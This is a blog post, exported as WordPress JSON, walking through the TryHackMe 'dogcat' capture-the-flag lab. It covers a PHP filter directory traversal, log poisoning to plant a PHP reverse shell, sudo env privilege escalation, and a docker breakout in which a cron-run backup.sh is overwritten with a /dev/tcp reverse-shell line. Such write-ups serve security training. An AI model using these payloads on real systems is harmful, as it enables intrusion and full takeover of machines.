{"id":132239,"date":"2023-03-05T17:47:52","date_gmt":"2023-03-05T17:47:52","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1184671"},"modified":"2023-03-05T17:47:52","modified_gmt":"2023-03-05T17:47:52","slug":"tryhackme-dogcat-walkthrough-easy-video","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2023\/03\/05\/tryhackme-dogcat-walkthrough-easy-video\/","title":{"rendered":"TryHackMe DogCat Walkthrough [+ Easy Video]"},"content":{"rendered":"\n<div class=\"kk-star-ratings kksr-auto kksr-align-left kksr-valign-top\" data-payload='{&quot;align&quot;:&quot;left&quot;,&quot;id&quot;:&quot;1184671&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;top&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;1&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;Rate this post&quot;,&quot;legend&quot;:&quot;5\\\/5 - (1 vote)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;{score}\\\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}'>\n<div class=\"kksr-stars\">\n<div class=\"kksr-stars-inactive\">\n<div class=\"kksr-star\" data-star=\"1\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"2\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"3\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"4\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"5\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"kksr-stars-active\" style=\"width: 142.5px;\">\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/div>\n<div class=\"kksr-legend\" style=\"font-size: 19.2px;\"> 5\/5 &#8211; (1 vote) <\/div>\n<\/p><\/div>\n<h2>CHALLENGE OVERVIEW<\/h2>\n<figure class=\"wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube\"><a href=\"https:\/\/blog.finxter.com\/tryhackme-dogcat-walkthrough-easy-video\/\"><img decoding=\"async\" src=\"https:\/\/blog.finxter.com\/wp-content\/plugins\/wp-youtube-lyte\/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2F8MYrYIQR-9o%2Fhqdefault.jpg\" alt=\"YouTube Video\"><\/a><figcaption><\/figcaption><\/figure>\n<ul>\n<li><strong>Link<\/strong>: <a href=\"https:\/\/tryhackme.com\/room\/dogcat\" target=\"_blank\" rel=\"noreferrer noopener\">THM Dogcat<\/a><\/li>\n<li><strong>Difficulty<\/strong>: Medium<\/li>\n<li><strong>Target<\/strong>: Flags 1-4<\/li>\n<li><strong>Highlight<\/strong>: intercepting and modifying a web request using <code>burpsuite&nbsp;<\/code><\/li>\n<li><strong>Tools used<\/strong>: <code>base64<\/code>, <code>burpsuite<\/code><\/li>\n<li><strong>Tags<\/strong>: <em>docker, directory traversal<\/em><\/li>\n<\/ul>\n<h2>BACKGROUND<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"693\" height=\"459\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-45.png\" alt=\"\" class=\"wp-image-1184695\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-45.png 693w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-45-300x199.png 300w\" sizes=\"auto, (max-width: 693px) 100vw, 693px\" \/><\/figure>\n<\/div>\n<p>In this tutorial, we will walk a simple website showing pictures of dogs and cats. <\/p>\n<p>We\u2019ll discover a directory traversal vulnerability that we can leverage to view sensitive files on the target machine. <\/p>\n<p>At the end of this challenge, we will break out of a docker container in order to capture the 4th and final flag.<\/p>\n<h2>ENUMERATION\/RECON<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"608\" height=\"855\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-51.png\" alt=\"\" class=\"wp-image-1184710\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-51.png 608w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-51-213x300.png 213w\" sizes=\"auto, (max-width: 608px) 100vw, 608px\" \/><\/figure>\n<\/div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">export target=10.10.148.135\nExport myIP=10.6.2.23\n<\/pre>\n<p>Let\u2019s walk the site. <\/p>\n<p>It looks like a simple image-viewing site that can randomize images of dogs and cats. After toying around with the browser addresses, we find that directory traversal allows us to view other files. <\/p>\n<p>Let\u2019s see if we can grab the HTML code that processes our parameters in the browser address. This will help us understand what is happening on the backend. <\/p>\n<p>We\u2019ll use a simple PHP filter to convert the contents to <a href=\"https:\/\/blog.finxter.com\/python-base64\/\" data-type=\"post\" data-id=\"327003\" target=\"_blank\" rel=\"noreferrer noopener\">base64<\/a> and output the raw base64 string.&nbsp;<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">http:\/\/10.10.148.135\/?view=php:\/\/filter\/read=convert.base64-encode\/resource=.\/dog\/..\/index<\/pre>\n<p>Raw output:<\/p>\n<pre class=\"wp-block-preformatted\"><code>PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA\/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg== <\/code><\/pre>\n<p>Let\u2019s save this string as a file named \u201c<code>string<\/code>\u201d. Then we can use the command \u201c<code>cat string | base64 -d<\/code>\u201d to decrypt this string and view it as raw HTML code.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"917\" height=\"604\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-43.png\" alt=\"\" class=\"wp-image-1184687\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-43.png 917w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-43-300x198.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-43-768x506.png 768w\" sizes=\"auto, (max-width: 917px) 100vw, 917px\" \/><\/figure>\n<\/div>\n<p>Reading over this HTML code, we can see that the file extension can be set! <\/p>\n<p>If the user doesn\u2019t specify the extension, the default will be <code>.php<\/code>. This means that we can add \u201c<code>&amp;ext=<\/code>\u201d to the end of our web address to avoid the <code>.php<\/code> extension from being added. <\/p>\n<p>In order for it to properly display our request, we need to include the word \u201cdog\u201d or \u201ccat\u201d in the address.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"942\" height=\"520\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-42.png\" alt=\"\" class=\"wp-image-1184685\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-42.png 942w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-42-300x166.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-42-768x424.png 768w\" sizes=\"auto, (max-width: 942px) 100vw, 942px\" \/><\/figure>\n<\/div>\n<p>Let\u2019s dive in with <code>burpsuite<\/code> and start intercepting and modifying requests.<\/p>\n<p>Here is our order of steps for us to get our initial foothold on the target machine:<\/p>\n<ol>\n<li>Create a PHP reverse shell<\/li>\n<li>Start up our <code>netcat<\/code> listener<\/li>\n<li>Use <code>burp<\/code> to intercept and modify the web request. Wait until later to click \u201c<code>forward<\/code>\u201d.<\/li>\n<li>Spin up a <a rel=\"noreferrer noopener\" href=\"https:\/\/blog.finxter.com\/python-one-liner-webserver\/\" data-type=\"post\" data-id=\"8635\" target=\"_blank\">simple HTTP server <\/a>with Python in the same directory as the PHP revshell.<\/li>\n<li>Click \u201c<code>forward<\/code>\u201d on <code>burp<\/code> to send the web request.<\/li>\n<li>Activate the shell by entering: <code>$targetIP\/bshell.php<\/code> in the browser address<\/li>\n<li>Catch the revshell on <code>netcat<\/code>!<\/li>\n<\/ol>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"713\" height=\"826\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-50.png\" alt=\"\" class=\"wp-image-1184709\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-50.png 713w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-50-259x300.png 259w\" sizes=\"auto, (max-width: 713px) 100vw, 713px\" \/><\/figure>\n<\/div>\n<h3>STEP 1<\/h3>\n<p>Let\u2019s create a PHP pentest monkey revshell.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"978\" height=\"628\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-41.png\" alt=\"\" class=\"wp-image-1184683\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-41.png 978w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-41-300x193.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-41-768x493.png 768w\" sizes=\"auto, (max-width: 978px) 100vw, 978px\" \/><\/figure>\n<\/div>\n<h3>STEP 2<\/h3>\n<p>Let\u2019s first start up a <code>netcat<\/code> listener on port 2222.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lnvp 2222<\/pre>\n<h3>STEP 3<\/h3>\n<p>Intercept the web request for the Apache2 log and modify the User-Agent field with a PHP code to request the <code>shell.php<\/code> code and rename it <code>bshell.php<\/code> on the target machine. <\/p>\n<p>This will work only because upon examining the Apache2 logs, we noticed that the User-Agent field is unencoded and vulnerable to command injection. Make sure to wait to click forward until step 5.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"942\" height=\"520\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-40.png\" alt=\"\" class=\"wp-image-1184682\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-40.png 942w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-40-300x166.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-40-768x424.png 768w\" sizes=\"auto, (max-width: 942px) 100vw, 942px\" \/><\/figure>\n<\/div>\n<h3>STEP 4<\/h3>\n<p>We\u2019ll spin up a simple python HTTP server in the same directory as our revshell to serve <code>shell.php<\/code> to our target machine via the modified web request we created in <code>burpsuite<\/code>.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"467\" height=\"123\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-39.png\" alt=\"\" class=\"wp-image-1184681\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-39.png 467w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-39-300x79.png 300w\" sizes=\"auto, (max-width: 467px) 100vw, 467px\" \/><\/figure>\n<\/div>\n<h3>STEP 5<\/h3>\n<p>Click forward on burp and check to see if code 200 came through for <code>shell.php<\/code> on the HTTP server.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"465\" height=\"271\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-38.png\" alt=\"\" class=\"wp-image-1184680\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-38.png 465w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-38-300x175.png 300w\" sizes=\"auto, (max-width: 465px) 100vw, 465px\" \/><\/figure>\n<\/div>\n<h3>STEP 6<\/h3>\n<p>We can activate the shell from our browser now and hopefully catch it as a revshell on our netcat listener.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"940\" height=\"175\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-37.png\" alt=\"\" class=\"wp-image-1184679\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-37.png 940w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-37-300x56.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-37-768x143.png 768w\" sizes=\"auto, (max-width: 940px) 100vw, 940px\" \/><\/figure>\n<\/div>\n<h3>STEP 7<\/h3>\n<p>We successfully caught it! Now we are in with our initial foothold!<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"458\" height=\"202\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-36.png\" alt=\"\" class=\"wp-image-1184678\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-36.png 458w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-36-300x132.png 300w\" sizes=\"auto, (max-width: 458px) 100vw, 458px\" \/><\/figure>\n<\/div>\n<h2>INITIAL FOOTHOLD<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"688\" height=\"613\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-49.png\" alt=\"\" class=\"wp-image-1184708\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-49.png 688w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-49-300x267.png 300w\" sizes=\"auto, (max-width: 688px) 100vw, 688px\" \/><\/figure>\n<\/div>\n<p>LOCATE THE FIRST FLAG<\/p>\n<p>Let\u2019s grab the first flag. We can grab it from our browser again in base64, or via the command line from the revshell.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">http:\/\/10.10.148.135\/?view=php:\/\/filter\/read=convert.base64-encode\/resource=.\/dog\/..\/flag\nPD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo\/Pgo=\n<\/pre>\n<p>Now we can decode this string (saved as <code>firstflag.txt<\/code>) with <code>base64<\/code>:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">base64 --decode firstflag.txt &lt;?php\n$flag_1 = \"THM{Th\u2014------------ommitted\u2014-------fa}\"\n?>\n<\/pre>\n<h2>LOCAL RECON<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"689\" height=\"854\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-48.png\" alt=\"\" class=\"wp-image-1184707\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-48.png 689w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-48-242x300.png 242w\" sizes=\"auto, (max-width: 689px) 100vw, 689px\" \/><\/figure>\n<\/div>\n<h3>LOCATE THE SECOND FLAG<\/h3>\n<p>We manually enumerate the filesystem and discover the second flag at <code>\/var\/www\/flag2_QMW7JvaY2LvK.txt<\/code><\/p>\n<p>Using the command find can help us quickly scan the filesystem for any files which contain the word \u201cflag\u201d.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">find \/ -type f -name '*flag*' 2>\/dev\/null<\/pre>\n<p>We found the second flag in plaintext!<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cat flag2_QMW7JvaY2LvK.txt\nTHM{LF\u2014------------ommitted\u2014-------fb}\n<\/pre>\n<h3>CHECK SUDO PERMISSIONS<\/h3>\n<p>Let\u2019s check out our sudo permissions with the command:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo -l\nMatching Defaults entries for www-data on 26e23794a52b: env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin User www-data may run the following commands on 26e23794a52b: (root) NOPASSWD: \/usr\/bin\/env\n<\/pre>\n<h2>EXPLOIT\/PRIVILEGE ESCALATION<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"607\" height=\"914\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-47.png\" alt=\"\" class=\"wp-image-1184705\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-47.png 607w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-47-199x300.png 199w\" sizes=\"auto, (max-width: 607px) 100vw, 607px\" \/><\/figure>\n<\/div>\n<p>Because we have sudo permissions without a password to run the env bin, we can easily become root with the command:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ sudo env \/bin\/bash<\/pre>\n<p>Now we can verify that we are root with the command <code>whoami<\/code>.<\/p>\n<h3>GRAB THE THIRD FLAG&nbsp;<\/h3>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cd \/root\nls\nflag3.txt\ncat flag3.txt\nTHM{D1\u2014------------ommitted\u2014-------12}\n<\/pre>\n<h2>POST-EXPLOITATION &#8211; BREAK OUT OF THE DOCKER CONTAINER<\/h2>\n<p>Let\u2019s start up a new listener to catch the new bash shell outside of the container.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lnvp 3333<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"627\" height=\"259\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-35.png\" alt=\"\" class=\"wp-image-1184677\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-35.png 627w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-35-300x124.png 300w\" sizes=\"auto, (max-width: 627px) 100vw, 627px\" \/><\/figure>\n<\/div>\n<p>We notice that there is a <code>backup.sh<\/code> that regularly runs on a schedule via cronjobs. We can hijack this file which is run by root outside of the docker container, by changing the contents to throw a revshell.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">echo \"#!\/bin\/bash\">backup.sh;echo \"bash -i>\/dev\/tcp\/10.6.2.23\/3333 0>&amp;1\">>backup.sh\nflag4.txt\ncat flag4.txt\nTHM{esc\u2014------------ommitted\u2014-------2d}\n<\/pre>\n<h2>FINAL THOUGHTS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"614\" height=\"907\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-46.png\" alt=\"\" class=\"wp-image-1184704\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-46.png 614w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-46-203x300.png 203w\" sizes=\"auto, (max-width: 614px) 100vw, 614px\" \/><\/figure>\n<\/div>\n<p>This box was a lot of fun. The bulk of the challenge was working towards gaining the initial foothold. <\/p>\n<p>Once we secured a revshell, the rest of the box went pretty quickly. <\/p>\n<p>The final step of breaking out of a docker container with a second revshell was the sneakiest part for me. <\/p>\n<p>The PHP directory traversal and using a php filter to encode with base64 was also a cool way to evade the data sanitation measures in place on the backend.&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>5\/5 &#8211; (1 vote) CHALLENGE OVERVIEW Link: THM Dogcat Difficulty: Medium Target: Flags 1-4 Highlight: intercepting and modifying a web request using burpsuite&nbsp; Tools used: base64, burpsuite Tags: docker, directory traversal BACKGROUND In this tutorial, we will walk a simple website showing pictures of dogs and cats. We\u2019ll discover a directory traversal vulnerability that we [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-132239","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/132239","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=132239"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/132239\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=132239"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=132239"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=132239"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}